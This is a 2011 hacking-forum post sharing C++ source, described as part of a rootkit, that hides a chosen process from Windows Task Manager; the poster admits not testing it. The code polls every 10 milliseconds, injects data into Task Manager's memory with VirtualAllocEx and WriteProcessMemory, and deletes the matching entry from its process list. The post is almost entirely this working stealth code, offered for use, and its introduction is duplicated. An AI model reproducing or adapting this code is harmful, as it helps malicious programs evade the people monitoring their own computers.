[C++] Rootkit (not checked, info inside) 02-21-2011, 04:20 PM
#1
Found code for hiding Your .exe from taskmgr.
So for me it's piece of rootkit well...
author: Bling111
I DIDN'T CHECKED IT!
Here we go:
Hackcommunity - Go Go Go! :]
So for me it's piece of rootkit well...
author: Bling111
I DIDN'T CHECKED IT!
Here we go:
Code:
#include <windows.h>
#include <iostream>
#include <commctrl.h>
BOOL CALLBACK EnumChildProcedure(HWND hWnd,LPARAM lParam){
char name[256];
GetWindowText(hWnd,name,256);
char ClassName[256];
GetClassName(hWnd,ClassName,256);
LVFINDINFO info;
memset(&info,0,sizeof(LVFINDINFO));
DWORD nIndex;
int Id;
char temp[]="taskmgr.exe"; //this name can be changed to the name of the desired program to be hidden
//i chose taskmgr.exe for this example because everybody will have that program in common if they are testing my program and checking task manager
info.flags = LVFI_STRING |LVFI_PARTIAL;
if((strcmp(ClassName,"SysListView32")==0)&&(strcmp(name,"Processes")==0))
{
GetWindowThreadProcessId(hWnd,(LPDWORD)&nIndex);
HANDLE Process=OpenProcess(PROCESS_ALL_ACCESS,FALSE, nIndex);
if(0<Process)
{
void *Address=VirtualAllocEx(Process,NULL,sizeof(info),MEM_RESERVE|MEM_COMMIT,PAGE_RE​ADWRITE);
void *Addressx=VirtualAllocEx(Process,NULL,sizeof(temp),MEM_RESERVE|MEM_COMMIT,PAGE_R​EADWRITE);
WriteProcessMemory(Process,Addressx,&temp,sizeof(temp),0);
info.psz=(char*)Addressx;
WriteProcessMemory(Process,Address,&info,sizeof(info),0);
Id=SendMessage(hWnd,LVM_FINDITEM,-1,(LPARAM) Address);
if(Id!=-1)
SendMessage(hWnd,LVM_DELETEITEM,Id,0);
}
}
if(name==NULL)
return FALSE;
return TRUE;
}
void Vigil()
{
HWND hWnd = NULL;
hWnd = ::FindWindow(NULL,"Windows Task Manager");
if(!hWnd)
{
return;
}
EnumChildWindows(hWnd,EnumChildProcedure,NULL);
}
int main()
{
while(1)
{
Vigil();
Sleep(10);
}
return 0;
}Hackcommunity - Go Go Go! :]
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
